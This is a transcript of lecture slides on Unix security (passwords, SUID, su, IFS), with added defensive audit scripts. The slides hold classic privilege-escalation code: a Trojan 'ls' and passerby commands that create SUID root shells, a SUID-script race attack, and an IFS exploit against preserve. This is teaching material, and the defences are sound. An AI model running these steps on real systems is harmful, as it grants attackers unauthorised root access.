The Attack and Defense of Computers - PowerPoint PPT Presentation

Provided by: yanl
Slides: 28

Transcript and Presenter's Notes

1
  • The Attack and Defense of Computers
  • Dr. ? ? ?

2
  • Passwords in Unix/Linux Systems

3
/etc/passwd
  • Format: one line per account, seven colon-separated fields
  • rachel:eH5/.mj7NB3dx:181:100:Rachel Cohen:/u/rachel:/bin/ksh
  • Fields, left to right:
  • account name (rachel)
  • encrypted password (eH5/.mj7NB3dx)
  • uid (181)
  • gid (100)
  • user name (Rachel Cohen)
  • home directory (/u/rachel)
  • login shell (/bin/ksh)
4
System Function Account
  • Unix opens special accounts for a variety of
    system functions (e.g. daemon/sys, ftp, nobody,
    uucp).
  • daemon:*:1:1::/tmp:
  • ftp:*:3:3:FTP User:/usr/spool/ftp:
  • nobody:*:60001:60001::/tmp:
  • uucp:*:4:4::/usr/spool/uucppublic:/usr/lib/uucp/uucico

The * in the password field matches no encrypted password, which
prevents users from using login to log into these accounts.
(This does not cover trusted-host/user rlogin.)
5
Password Crackers
  • Download (1)
  • Download (2)
  • John the Ripper password cracker -- Linux
  • Ophcrack 2 -- Windows

6
One Time Password
  • Password list
  • Small Card
  • Calculator

7
  • UID, GID, and SUID

8
Account Name and UID
  • UID 0 → root.
  • A system identifies a user by her/his UID, not
    her/his name.
  • e.g. name root, UID 100 → no root privilege
  • name doggy, UID 0 → root privilege.
  • Good habit: the user name root should be
    reserved for system administrators.
  • Users with different user names but with the same
    UID are treated as the same user by the system.
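The two rules on slides 3 and 8 (the seven-field format, and "privilege follows the UID, not the name") can be checked mechanically. The following audit script is an added example, not part of the slides; it reads passwd-format lines on standard input and reports empty password fields, UID 0 accounts other than root, UIDs shared by several names, and malformed lines. The sample entries are constructed for the demonstration (the rachel line is the one from slide 3; the other names and hashes are invented).

```sh
#!/bin/sh
# Added audit helper, not part of the slides: read /etc/passwd-format lines and
# report what slides 3 and 8 warn about. All entries below are constructed.

# Constructed sample in the seven-field format of slide 3 (hashes are not real).
sample_passwd() {
  cat <<'EOF'
root:x:0:0:root:/root:/bin/sh
rachel:eH5/.mj7NB3dx:181:100:Rachel Cohen:/u/rachel:/bin/ksh
doggy:x:0:0:Doggy:/home/doggy:/bin/sh
bob:x:181:100:Bob:/home/bob:/bin/sh
guest::1001:100:Guest:/home/guest:/bin/sh
broken:x:5:5
daemon:*:1:1::/tmp:
EOF
}

# Read passwd lines on stdin; print one finding per line.
audit_passwd() {
  seen=
  while IFS= read -r line; do
    case $line in ''|'#'*) continue ;; esac
    # A valid entry has exactly seven fields, i.e. six colons.
    colons=$(printf '%s' "$line" | tr -cd ':' | wc -c | tr -d ' ')
    if [ "$colons" -ne 6 ]; then
      echo "malformed entry: $line"
      continue
    fi
    # Pull the first three fields apart with parameter expansion, so the shell
    # never re-parses the line (a $ inside a hash stays literal).
    rest=$line
    name=${rest%%:*}; rest=${rest#*:}
    pw=${rest%%:*};   rest=${rest#*:}
    uid=${rest%%:*}
    case $uid in
      ''|*[!0-9]*) echo "non-numeric UID for $name: '$uid'"; continue ;;
    esac
    # Empty password field: login asks for no password at all.
    [ -z "$pw" ] && echo "no password required: $name"
    # Slide 8: privilege follows UID 0, whatever the account is called.
    [ "$uid" -eq 0 ] && [ "$name" != root ] && echo "UID 0 account besides root: $name"
    # Slide 8: two names with one UID are the same user to the kernel.
    case " $seen " in
      *" $uid:"*)
        prev=${seen##*" $uid:"}; prev=${prev%% *}
        echo "duplicate UID $uid: $name shares it with $prev" ;;
    esac
    seen="$seen $uid:$name"
  done
}

sample_passwd | audit_passwd
```

On a real system run `audit_passwd < /etc/passwd`; a UID 0 entry other than root, or a shared UID, is exactly the "doggy" case the slide describes.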

9
Real UIDs and Effective UIDs
  • A Unix process has at least these two IDs:
  • Real UID: the process owner's real identity; it
    matches the user name the owner logged in as.
  • Effective UID: the system decides a process's
    privileges based on this ID.
  • Usually, the above two IDs of a process are the
    same.

10
setuid or SUID program
  • When a suid program is run, the process involved
    takes on an effective UID that is the same as the
    owner of the file, but the real UID remains the
    same as that of the user who creates the
    process.
  • chmod 4xxx filename
  • e.g.
  • chmod 4757 program_name
  • ls -al
  • ..
  • -rwsr-xrwx root user 16384 Sep 3 2005
    program_name

The s in the owner-execute position is the suid program indicator.
11
setuid Program examples
  • su
  • passwd

12
Group
  • Each user belongs to a primary group that is
    stored in the /etc/passwd file.
  • The /etc/group file contains every group and its
    gid in a system.
  • vision:*:101:keith,arlin,janice
  • users:*:100:
  • startrek:*:102:janice,karen,arlin
  • Each user can belong to several different groups,
    but her/his gid can be the gid of only one of the
    groups to which she/he belongs.
  • A user can use the command newgrp to change her/his
    gid.

13
su: Substitute User
  • $ whoami
  • tim
  • $ su john
  • Password:
  • $ whoami
  • john
  • $ su
  • Password:   (the super user password)
  • # whoami    (new prompt: # instead of $)
  • root
14
Security Problem with su
  • Type /bin/su -

The trailing - causes the sub-shell to read all relevant startup
files and simulate a login; therefore, the new
shell uses root's environment variables,
including PATH. Typing the full path /bin/su and the -
1) avoids a Trojan horse (another program with the
same name in one of the directories listed
in the PATH variable); 2) the access rights of the
directory that contains the Trojan may not be set
correctly.
15
Stealing Superuser Account
  • Assume root's PATH variable is as follows:
    .:xxxxxxx  (the current directory . comes first)
  • Observation: when going into a directory, the
    first command a user types usually is ls.
  • cat ls
  • #! /bin/sh
  • cp /bin/sh ./stuff/junk/.superdude
  • chmod 4555 ./stuff/junk/.superdude
  • rm -f $0
  • exec /bin/ls "$@"
  • cd
  • chmod 700 .
  • touch ./-f

A Trojan horse shell script with the name ls.
1) Change the access rights of the user's home
directory so that the victim must use the root
account to see the content of this directory. 2)
Create a file named -f.
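Slides 14 and 15 both come down to what root's PATH contains: a leading `.`, an empty entry, a relative entry, or a directory that anyone can write to is what lets a look-alike `ls` run in place of /bin/ls. The check below is an added example, not part of the slides; it walks a PATH value entry by entry and prints one finding per hazardous entry. Directory names used in the demonstration are constructed.

```sh
#!/bin/sh
# Added check, not part of the slides: inspect a PATH value for the conditions
# that let the slide-15 Trojan horse work. Directory names are constructed.

# Print one finding per line for the PATH value given as $1.
audit_path() {
  rest=$1:                     # trailing ':' so the loop also handles the last entry
  while [ -n "$rest" ]; do
    dir=${rest%%:*}; rest=${rest#*:}
    case $dir in
      ''|.)
        # "." or an empty entry means the current directory: commands are
        # taken from wherever root happens to cd.
        echo "current directory in PATH ('$dir')" ;;
      /*)
        # Absolute entry: a hazard only if others can write to it.
        [ -d "$dir" ] && [ -n "$(find "$dir" -prune -perm -0002 2>/dev/null)" ] \
          && echo "world-writable directory in PATH: $dir" ;;
      *)
        echo "relative directory in PATH: $dir" ;;
    esac
  done
}

# The setting /bin/su - gives root on a sane system: absolute, root-owned
# system directories only (constructed list; adjust to the local layout).
safe_path() {
  PATH=/usr/sbin:/usr/bin:/sbin:/bin
  export PATH
}

echo "checking PATH=$PATH"
audit_path "$PATH"
```

A PATH that produces no findings is the precondition for trusting a bare `ls`; until then, the full-path habit from slide 14 is the only protection.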
16
Account Steal by Passersby
  • cp /bin/sh /tmp/break-acct
  • chmod 4755 /tmp/break-acct

When a user leaves her/his terminal unattended, a
bystander could create a backdoor easily by
just typing the above commands.
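The two misuses of the setuid bit on slides 10 and 16 are both visible in the file system: a setuid file that is also world-writable (what `chmod 4757` leaves behind) and a setuid byte-for-byte copy of /bin/sh in a public directory. The following audit is an added example, not part of the slides; it lists setuid files under a directory and flags those cases, plus setuid interpreter scripts. The scan root and file names in the demonstration are constructed.

```sh
#!/bin/sh
# Added audit helper, not part of the slides: find setuid files under a
# directory and flag the cases slides 10 and 16 make dangerous. The scan root
# and the file names used when testing are constructed.

# Print one line per setuid file: "<mode> <path> [flags]".
audit_setuid() {               # $1 = directory to scan
  find "$1" -type f -perm -4000 2>/dev/null | while IFS= read -r f; do
    mode=$(ls -ld "$f" | cut -d' ' -f1)
    flags=
    # chmod 4757 (slide 10) leaves o+w: anyone can replace the program that
    # runs with the owner's privileges.
    [ -n "$(find "$f" -prune -perm -0002)" ] && flags="$flags world-writable"
    # A setuid interpreter script is opened twice (kernel, then interpreter).
    [ "$(head -c 2 "$f" 2>/dev/null)" = '#!' ] && flags="$flags interpreter-script"
    # A byte-for-byte copy of /bin/sh is the slide-16 backdoor.
    cmp -s "$f" /bin/sh && flags="$flags copy-of-/bin/sh"
    printf '%s %s%s\n' "$mode" "$f" "$flags"
  done
}

# Default scan root is /tmp, the directory slide 16 uses; pass another as $1.
audit_setuid "${1:-/tmp}"
```

Run it over /tmp, /var/tmp and users' home directories; any setuid file outside the system directories deserves a look, and a `copy-of-/bin/sh` flag is the backdoor from slide 16 verbatim.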
17
  • Shells and Shell Scripts

18
Shell
  • Also called a command line interpreter.
  • When you log into a system, it displays a prompt
    on the screen and waits for you to enter a command.
  • A running shell is also a process.
  • Some of the famous shells:
  • Bourne shell (/bin/sh)
  • Bourne Again shell (/bin/bash)
  • Korn shell (/bin/ksh)
  • C shell (/bin/csh)

19
Shell Script
  • A shell script is a series of commands written in a
    plain text file.
  • In order to make a shell script executable, its
    file permission must be changed to executable.
  • Usually the first line of a shell script is as
    follows:
  • #! shell   (the path of the shell, e.g. #!/bin/sh)
  • , then followed by a series of commands.

20
Security Problems of SUID Shell Script
  • Two shells are involved in the execution of a
    shell script:
  • the shell that accepts the shell script command, and
  • the shell that executes the shell script.
  • Race Condition
  • Attack script:
  • cd /tmp
  • ln /etc/setid_script temp
  • nice -20 temp
  • mv my_script temp

Between the time the kernel opens the file to see
which interpreter to run, and when the
(now-set-id) interpreter turns around and reopens
the file to interpret it, an attacker might
change the file (directly or via symbolic links).
The script file is opened twice:
  • by the kernel
  • by the executing shell
21
Solution
  • /dev/fd
  • When the kernel passes the name of the set-id
    script to open to the interpreter, rather than
    using a pathname (which would permit the race
    condition) it instead passes the filename
    /dev/fd/3.
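The difference between the two slides above is whether the second open uses a pathname or the descriptor the kernel already holds. The demonstration below is an added example, not part of the slides; it replays the sequence with a plain file: open it on descriptor 3, swap another file in at the same path (the attacker's move), then reopen it either by name or through /dev/fd/3. File names are constructed in a temporary directory.

```sh
#!/bin/sh
# Added demonstration, not part of the slides: why handing the interpreter
# /dev/fd/N instead of a pathname removes the race. File names are
# constructed; the "attacker" is the mv in the middle of each sequence.

# Create the file the kernel opens and a replacement that gets swapped in.
make_pair() {
  demo=$(mktemp -d)
  printf 'original\n' > "$demo/script"
  printf 'replaced\n' > "$demo/other"
}

# Vulnerable sequence: first open on fd 3, swap at the path, reopen by name.
# Prints the content the interpreter would actually run.
reopen_by_path() {
  (
    make_pair
    exec 3< "$demo/script"           # kernel's open, to read the #! line
    mv "$demo/other" "$demo/script"  # attacker swaps the file in between
    cat "$demo/script"               # interpreter's second open, by pathname
    exec 3<&-
    rm -rf "$demo"
  )
}

# Fixed sequence: the second open goes through /dev/fd/3, which names the
# file object already open, so the swap at the path no longer matters.
reopen_by_fd() {
  (
    make_pair
    exec 3< "$demo/script"
    mv "$demo/other" "$demo/script"
    cat /dev/fd/3                    # the same inode the kernel opened
    exec 3<&-
    rm -rf "$demo"
  )
}

echo "by pathname: $(reopen_by_path)"   # replaced
echo "by /dev/fd:  $(reopen_by_fd)"     # original
```

The same property is what `/dev/fd` gives the set-id interpreter: whatever happens to the directory entry after the kernel's open, the interpreter reads the bytes the kernel inspected.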

22
  • IFS Security

23
IFS Environment Variable
  • The IFS (internal field separator) specifies which
    characters separate the words of a command.
  • It is normally set to a space, tab, or newline.

24
IFS and Shell Script Security
  • By changing the IFS, a hacker can change what
    programs our script executes.
  • Our script calls the /usr/bin/passwd program.
  • Changing the IFS to "/" with
  • export IFS='/'
  • causes the script to no longer run
    /usr/bin/passwd, but instead run usr bin passwd.
  • Now a hacker can create a script called usr that
    generates a root shell.

25
Security Hole in /usr/lib/preserve
vi
1. telnet
2. disconnect
3. preserve saves the edited file in a restricted area
4. the recover program reads the file from the area
26
/usr/lib/preserve and /bin/mail
  • preserve was installed SUID root.
  • preserve ran /bin/mail as the root user to alert
    users that their files had been preserved.
  • preserve executed the mail program with the
    system() function call.

system() hands its string to the shell, which parses it
into command, options, and arguments according to the
content of IFS.
27
Change IFS to Execute a Different Program/Script
  • If IFS=/, then preserve will execute bin mail
    instead of /bin/mail.
  • cat bin
  • #! /bin/sh
  • cd /home/mydir/bin
  • cp /bin/sh ./sh
  • chown root sh
  • chmod 4755 sh
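Slides 24 and 27 rely on the same mechanism: the shell splits a command line into words using IFS, so `IFS=/` turns `/usr/bin/passwd` into `usr bin passwd` and `/bin/mail` into `bin mail`. The script below is an added example, not part of the slides; it makes the split visible without executing anything (using `set --` to capture the words), and then shows the two lines a privileged script should start with so that an inherited IFS or PATH cannot steer it. The values are constructed.

```sh
#!/bin/sh
# Added example, not part of the slides: watch IFS change how the shell splits
# an unquoted expansion (the mechanism behind slides 24 and 27), then the
# prologue a script run with privileges should start with. Values constructed.

# Print, one per line, the words the shell derives from expanding $2 unquoted
# while IFS is $1. 'set --' captures the split without executing a command.
words_under_ifs() {             # $1 = IFS value, $2 = string to expand
  (
    IFS=$1
    set -- $2                   # unquoted on purpose: splitting happens here
    if [ $# -gt 0 ]; then printf '%s\n' "$@"; fi
  )
}

# What a script must do before trusting anything from its caller: put IFS back
# to space/tab/newline and PATH to fixed system directories. The trailing 'x'
# stops $( ) from stripping the newline that IFS needs.
harden_environment() {
  IFS=$(printf ' \t\nx'); IFS=${IFS%x}
  PATH=/usr/bin:/bin
  export PATH
}

echo "with IFS=/ the words of /usr/bin/passwd are:"
words_under_ifs '/' /usr/bin/passwd
echo "after harden_environment it is one word again:"
( harden_environment; words_under_ifs "$IFS" /usr/bin/passwd )
```

Two habits follow from the output: reset IFS and PATH at the top of any script that may be invoked with a caller's environment, and quote expansions (`"$cmd"`) so that an attacker-controlled IFS has nothing to split.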